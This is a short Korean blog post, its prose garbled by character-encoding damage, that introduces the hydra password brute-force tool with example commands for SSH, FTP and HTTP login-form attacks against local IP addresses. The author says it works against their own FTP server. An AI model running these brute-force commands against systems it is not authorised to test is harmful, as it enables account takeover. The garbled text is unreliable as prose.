๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
๐Ÿ”’์ •๋ณด๋ณด์•ˆ/๋„คํŠธ์›Œํฌ ๋ณด์•ˆ

๋„คํŠธ์›Œํฌ ํ•ดํ‚น - hydra, ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ ๋„๊ตฌ

by Janger 2021. 11. 22.
728x90
๋ฐ˜์‘ํ˜•

https://www.kali.org/tools/hydra/

 

hydra | Kali Linux Tools

hydra Usage Example Attempt to login as the root user (-l root) using a password list (-P /usr/share/wordlists/metasploit/unix_passwords.txt) with 6 threads (-t 6) on the given SSH server (ssh://192.168.1.123): root@kali:~# hydra -l root -P /usr/share/word

www.kali.org

 

hydra๋Š” FTP, SSH, MS-SQL, HTTP ๋“ฑ ๋‹ค์–‘ํ•œ ํ”„๋กœํ† ์ฝœ์„ ๋Œ€์ƒ์œผ๋กœ ์•„์ด๋””, ์•”ํ˜ธ ๋ฌด์ฐจ๋ณ„ ๋Œ€์ž… ๊ณต๊ฒฉ ๋„๊ตฌ์ด๋‹ค. 

 

 

 

example) 

hydra -l {UserID} -p {UserPW} ssh://192.168.0.5
hydra -L {UserIDs.txt} -P {UserPW.txt} ftp://192.168.0.5

๋‹น์—ฐํžˆ ๋ฏธ๋ฆฌ ์ •์˜๋œ ํŒจ์Šค์›Œ๋“œ ๋ฆฌ์ŠคํŠธ๋ฅผ ๋ถˆ๋Ÿฌ์™€ ์‚ฌ์ „ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•  ์ˆ˜๋„ ์žˆ์Œ.

 

 

 

๋‚ด FTP ์„œ๋ฒ„์—๋‹ค ์จ๋ดค๋Š”๋ฐ ์ž˜ ์ž‘๋™ํ•œ๋‹ค. 

 

 

์•„๋ž˜๋Š” HTTP๋ฅผ ๋Œ€์ƒ์œผ๋กœ ํ•œ ์˜ˆ์‹œ

hydra -o result.txt -s {port} -l {id} -p {pw} 192.168.0.5 http-post-form "/login:id=^USER^&pw=^PASS^:Wrong"

-o ํŒŒ์ผ ์ถœ๋ ฅ
-s ํฌํŠธ ๋ฒˆํ˜ธ
-l ์•„์ด๋””
-p ํŒจ์Šค์›Œ๋“œ

"/login:id=^USER^&pw=^PASS^:Wrong"
"ํŒŒ๋ผ๋ฏธํ„ฐ:์•„์ด๋””=^USER^&๋น„๋ฐ€๋ฒˆํ˜ธ=^PASS^:ํ‹€๋ฆฐ ๊ฒฝ์šฐ ์‹๋ณ„ ๋ฌธ์ž"

 

728x90
๋ฐ˜์‘ํ˜•